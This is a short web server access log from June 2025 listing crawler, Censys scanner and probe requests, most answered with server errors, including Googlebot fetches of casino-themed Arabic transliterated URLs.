66.249.75.236 - - [13/Jun/2025:04:56:43 +0200] "GET /?rhlt-astratyjyt-fy-kazynw-shbr-alkhymt-mghamrt-alfwz-alkbyr HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
95.182.100.70 - - [13/Jun/2025:05:36:05 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36"
66.249.75.236 - - [13/Jun/2025:05:39:08 +0200] "GET /authors/128 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
157.55.39.205 - - [13/Jun/2025:05:52:04 +0200] "GET /product/pages/87 HTTP/1.1" 500 542 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.75.236 - - [13/Jun/2025:06:15:40 +0200] "GET /?afdl-alkazynwhat-wtjarb-almrahnat-fy-alaqsr HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.75.225 - - [13/Jun/2025:06:44:40 +0200] "GET /?thlyl-myq-lastratyjyat-almrahnat-fy-alaqsr HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.45.154.132 - - [13/Jun/2025:07:00:51 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.132 - - [13/Jun/2025:07:00:58 +0200] "GET /favicon.ico HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.132 - - [13/Jun/2025:07:01:06 +0200] "GET /login HTTP/1.1" 500 542 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
45.192.99.121 - - [13/Jun/2025:07:12:09 +0200] "GET /users/sign_in HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0"
45.192.99.121 - - [13/Jun/2025:07:12:09 +0200] "POST /index.php?s=/home/page/uploadImg HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15"
45.192.99.121 - - [13/Jun/2025:07:12:09 +0200] "POST /cgi-bin/rpc HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27"
66.249.75.224 - - [13/Jun/2025:07:16:34 +0200] "GET /?astratyjyat-alfwz-fy-alab-alkazynw-wtjarb-alaskndryt-alrayt HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.76.161 - - [13/Jun/2025:07:28:39 +0200] "GET /authors/148 HTTP/1.1" 500 542 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.7103.113 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
199.45.154.150 - - [13/Jun/2025:07:46:51 +0200] "GET / HTTP/1.1" 500 542 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.154.150 - - [13/Jun/2025:07:47:12 +0200] "GET /favicon.ico HTTP/1.1" 200 0 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
